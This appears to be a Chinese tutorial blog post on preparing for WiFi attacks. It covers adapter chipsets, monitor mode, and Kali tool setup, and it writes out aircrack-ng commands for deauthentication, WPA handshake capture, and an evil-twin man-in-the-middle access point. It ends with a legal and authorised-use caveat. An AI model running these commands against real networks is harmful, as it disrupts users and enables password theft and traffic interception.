爱安全 内网攻防全套(wifi破解-内网渗透-权限提升-维持访问)

121 阅读4分钟

在无线攻击前的准备阶段,网卡选择、监听模式设置与工具环境搭建是关键环节,直接影响攻击的可行性和成功率。以下是具体准备方案及分析:

一、网卡选择:兼容性与功能优先级

无线攻击需依赖支持监听模式(Monitor Mode)数据包注入的网卡,此类网卡可捕获空中所有数据包(而非仅定向数据),并模拟合法设备发送伪造帧。推荐以下芯片组及对应网卡:

  1. Atheros AR9271

    • 推荐网卡:Alfa AWUS036NHA
    • 优势:2.4GHz频段,传输距离远、速度快,兼容性稳定,适合长时间监听。
    • 适用场景:需要覆盖远距离目标或高稳定性要求的攻击。
  2. Ralink RT3070/RT3572

    • 推荐网卡:Alfa AWUS036NH
    • 优势:支持b/g/n规范,加密类型全面(WEP/WPA/WPA2),天线可升级,兼容Linux/Windows/Mac。
    • 适用场景:多平台环境或需要灵活调整天线的场景。
  3. Realtek RTL8812AU

    • 推荐网卡:Alfa AWUS036ACH
    • 优势:双频(2.4GHz/5GHz),支持802.11ac标准,数据速率高(300Mbps/867Mbps),适合高速网络攻击。
    • 注意:需安装驱动(realtek-rtl88xxau-dkms),适合Kali Linux最新版。
  4. TP-LINK TL-WN722N(v1版)

    • 优势:价格低廉(百元内),小巧便携。
    • 限制:v2版不支持Kali,需确认芯片组为Atheros AR9271。
    • 适用场景:预算有限或临时测试。

避坑指南

  • 避免选择仅支持Managed Mode(默认客户端模式)的网卡,此类网卡无法捕获空中数据包。
  • 旧款芯片(如Realtek 8187L)性能较差,仅适用于基础攻击。

二、监听模式设置:从默认到混杂

无线网卡默认工作在Managed Mode(连接特定AP),需切换至Monitor Mode以捕获所有数据包。以下是具体步骤:

  1. 关闭干扰进程

    bash
    	sudo airmon-ng check kill  # 终止NetworkManager、wpa_supplicant等进程
    
  2. 启动监听模式

    bash
    	sudo airmon-ng start wlan0  # wlan0为网卡接口名,启动后变为wlan0mon
    
  3. 验证状态

    bash
    	iwconfig wlan0mon  # 查看模式是否为Monitor
    
  4. 指定信道(可选)

    bash
    	sudo iwconfig wlan0mon channel 6  # 锁定至目标AP信道
    

退出监听模式

bash
	sudo airmon-ng stop wlan0mon  # 恢复为Managed Mode

三、工具环境搭建:Kali Linux核心套件

Kali Linux预装了无线攻击所需工具,需确认安装并更新至最新版:

  1. 基础工具包

    bash
    	sudo apt update && sudo apt install -y aircrack-ng wireshark reaver  # 包含监听、破解、中间人攻击工具
    
  2. Wireshark配置

    • 以非root用户启动时,需将用户加入wireshark组:

      bash
      	sudo usermod -aG wireshark $USER
      
    • 重启后,Wireshark可捕获无线网卡数据包。

  3. 远程抓包(可选)
    若通过SSH控制远程Kali主机,可使用ssh remote capture功能:

    • 在Wireshark中选择Capture → Options → SSH Remote Capture,配置远程主机IP、端口及root凭证。

四、攻击场景适配:工具与网卡联动

根据攻击目标选择工具组合:

  1. Deauth攻击(强制断网)

    • 工具:aireplay-ng

    • 命令示例:

      bash
      	aireplay-ng -0 10 -a AP_MAC -c CLIENT_MAC wlan0mon  # 向目标客户端发送10次Deauth帧
      
  2. 握手包捕获(密码破解)

    • 工具:airodump-ng + aireplay-ng

    • 流程:

      bash
      	airodump-ng -c 6 --bssid AP_MAC -w capture wlan0mon  # 监听特定AP
      
      	aireplay-ng -0 5 -a AP_MAC -c CLIENT_MAC wlan0mon  # 触发客户端重新认证
      
  3. 中间人攻击(流量劫持)

    • 工具:airbase-ng + iptables + udhcpd

    • 流程:

      bash
      	airbase-ng -e FakeAP -c 6 wlan0mon  # 创建虚假AP
      
      	ifconfig at0 up && ifconfig at0 192.168.1.1/24  # 配置虚拟接口
      
      	echo 1 > /proc/sys/net/ipv4/ip_forward  # 启用路由转发
      
      	iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE  # 流量转发
      

五、风险与合规性

  • 法律边界:未经授权的无线攻击可能违反《刑法》第285/286条(非法侵入计算机信息系统/破坏计算机信息系统)。
  • 道德准则:仅在授权测试(如CTF竞赛、企业安全演练)中使用,避免对公共网络造成干扰。